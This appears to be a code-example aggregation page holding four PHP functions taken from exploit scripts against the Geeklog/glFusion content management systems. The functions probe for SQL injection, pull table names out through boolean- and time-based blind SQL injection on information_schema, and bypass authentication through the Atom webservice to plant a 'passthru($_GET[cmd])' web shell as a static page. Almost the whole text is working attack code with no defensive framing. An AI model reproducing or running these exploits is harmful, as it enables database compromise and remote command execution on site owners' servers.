Example #1
0
function run_test()
{
    global $host, $port, $path, $cookies, $url, $prefix;
    $_sql = ")";
    $out = _s($url, $cookies, 1, "mode=savepreferences&" . $prefix . "blocks[0]=" . urlencode($_sql) . "&");
    if (chk_err($out)) {
        print "[*] Vulnerable!\n";
    } else {
        die("[!] Not vulnerable ...");
    }
}
Example #2
0
function find_prefix()
{
    global $_lnks, $v, $type, $host, $port, $path, $prepend;
    $_table_name = "";
    $j = 1;
    print "[*] Table name -> ";
    while (!strstr($_table_name, chr(0))) {
        $mn = 0x0;
        $mx = 0xff;
        while (1) {
            if (($mx + $mn) % 2 == 1) {
                $c = round(($mx + $mn) / 2) - 1;
            } else {
                $c = round(($mx + $mn) / 2);
            }
            $sql = urlencode("(CASE WHEN (SELECT (ASCII(SUBSTR(TABLE_NAME FROM {$j} FOR 1)) >= " . $c . ") FROM information_schema.TABLES WHERE TABLE_NAME LIKE 0x25747261636b6261636b636f646573 LIMIT 1) THEN " . $v[0] . " ELSE " . $v[1] . " END) LIMIT 1--");
            $url = "http://{$host}:{$port}" . $path . "search.php?" . $prepend . "&datestart=&dateend=1&type=" . $type . "&author=0&results=25&mode=search";
            $_d = "order=" . $sql . ";";
            $_o = _s($url, $_d);
            if (chk_err($_o)) {
                die("\n[!] information_schema not availiable!");
            }
            $l = xtrct_lnk($_o);
            if ($l == $_lnks[0]) {
                $mn = $c;
            } else {
                $mx = $c - 1;
            }
            if ($mx - $mn == 1 or $mx == $mn) {
                $sql = urlencode("(CASE WHEN (SELECT (ASCII(SUBSTR(TABLE_NAME FROM {$j} FOR 1)) = " . $mn . ") FROM information_schema.tables WHERE TABLE_NAME LIKE 0x25747261636b6261636b636f646573 LIMIT 1) THEN " . $v[0] . " ELSE " . $v[1] . " END) LIMIT 1--");
                $url = "http://{$host}:{$port}" . $path . "search.php?" . $prepend . "&datestart=&dateend=1&type=" . $type . "&author=0&results=25&mode=search";
                $_d = "order=" . $sql . ";";
                $_o = _s($url, $_d);
                $l = xtrct_lnk($_o);
                if ($l == $_lnks[0]) {
                    print chr($mn);
                    $_table_name .= chr($mn);
                } else {
                    print chr($mx);
                    $_table_name .= chr($mx);
                }
                break;
            }
        }
        $j++;
    }
    print "\n";
    $_prefix = str_replace("trackbackcodes", "", $_table_name);
    return $_prefix;
}
Example #3
0
function sp_php()
{
    global $host, $port, $path, $pwd, $prefix, $uid;
    srand(make_seed());
    $id = rand(0x1, 0xffffff);
    echo "[*] id->" . $id . "\n";
    $sh = "passthru(\$_GET[cmd]);";
    //always specify the namespaceuri
    //if the staticpages.PHP permission is not avaliable, sp_php will be resetted to 0
    $data = "<?xml version=\"1.0\"?>" . "<entry>" . "<title term=\"1\" xmlns=\"http://www.geeklog.net/xmlns/app/gl\">    </title>" . "<id xmlns=\"http://www.geeklog.net/xmlns/app/gl\">{$id}</id>" . "<sp_content xmlns=\"http://www.geeklog.net/xmlns/app/gl\">{$sh}</sp_content>" . "<sp_php xmlns=\"http://www.geeklog.net/xmlns/app/gl\">1</sp_php>" . "<gl_etag xmlns=\"http://www.geeklog.net/xmlns/app/gl\">1</gl_etag>" . "</entry>";
    $usr = "******" . $prefix . "users LIMIT 1/*";
    $url = "http://{$host}:{$port}" . $path . "webservices/atom/index.php?plugin=staticpages";
    $out = _s($url, base64_encode($usr . ":" . $pwd), 1, $data);
    if (chk_err($_o)) {
        print "[*] Sql error.";
    } else {
        print "[*] Done! Visit->http://{$host}:{$port}" . $path . "staticpages/index.php?page={$id}&cmd=ls%20-la";
    }
}
Example #4
0
function find_prefix()
{
    global $host, $port, $path, $delayfunc, $_user, $_pwd, $n;
    $_tn = "TABLE_NAME";
    //case important ??
    $_ift = "information_schema.TABLES";
    //??
    $_table_prefix = "";
    $j = -15;
    print "[*] Initiating table prefix extraction...\n";
    while (!$null_f) {
        $mn = 0x0;
        $mx = 0xff;
        while (1) {
            if (($mx + $mn) % 2 == 1) {
                $c = round(($mx + $mn) / 2) - 1;
            } else {
                $c = round(($mx + $mn) / 2);
            }
            $sessid = login();
            $sql = " AND (CASE WHEN (SELECT (ASCII(SUBSTR(" . $_tn . " FROM {$j} FOR 1)) >= " . $c . ") FROM " . $_ift . " WHERE " . $_tn . " LIKE 0x25747261636b6261636b636f646573 LIMIT 1) THEN {$delayfunc} ELSE 0 END) ) LIMIT 1-- ";
            $cookies = "glf_session={$sessid}" . $sql . "; glfusion=9999999999;";
            $url = "http://{$host}:{$port}" . $path;
            $starttime = time();
            $_o = _s($url, $cookies, 0, "");
            $endtime = time();
            $difftime = $endtime - $starttime;
            if (chk_err($_o)) {
                die("\n[!] information_schema not availiable! MySQL < 5.0");
            }
            if ($difftime > $n - 1) {
                $mn = $c;
                sleep($n);
            } else {
                $mx = $c - 1;
            }
            if ($mx - $mn == 1 or $mx == $mn) {
                $sessid = login();
                $sql = " AND (CASE WHEN (SELECT (ASCII(SUBSTR(" . $_tn . " FROM {$j} FOR 1)) = " . $mn . ") FROM " . $_ift . " WHERE " . $_tn . " LIKE 0x25747261636b6261636b636f646573 LIMIT 1) THEN {$delayfunc} ELSE 0 END) ) LIMIT 1-- ";
                $cookies = "glf_session={$sessid}" . $sql . "; glfusion=9999999999;";
                $url = "http://{$host}:{$port}" . $path;
                $starttime = time();
                $_o = _s($url, $cookies, 0, "");
                $endtime = time();
                $difftime = $endtime - $starttime;
                if ($difftime > $n - 1) {
                    if ($mn != 0) {
                        $_table_prefix = chr($mn) . $_table_prefix;
                    } else {
                        $null_f = true;
                    }
                } else {
                    $_table_prefix = chr($mx) . $_table_prefix;
                }
                if (!$null_f) {
                    print "[?] Table prefix->[??]" . $_table_prefix . "\n";
                }
                sleep($n);
                break;
            }
        }
        $j--;
    }
    print "[?] Table prefix->" . $_table_prefix . "\n";
    return $_table_prefix;
}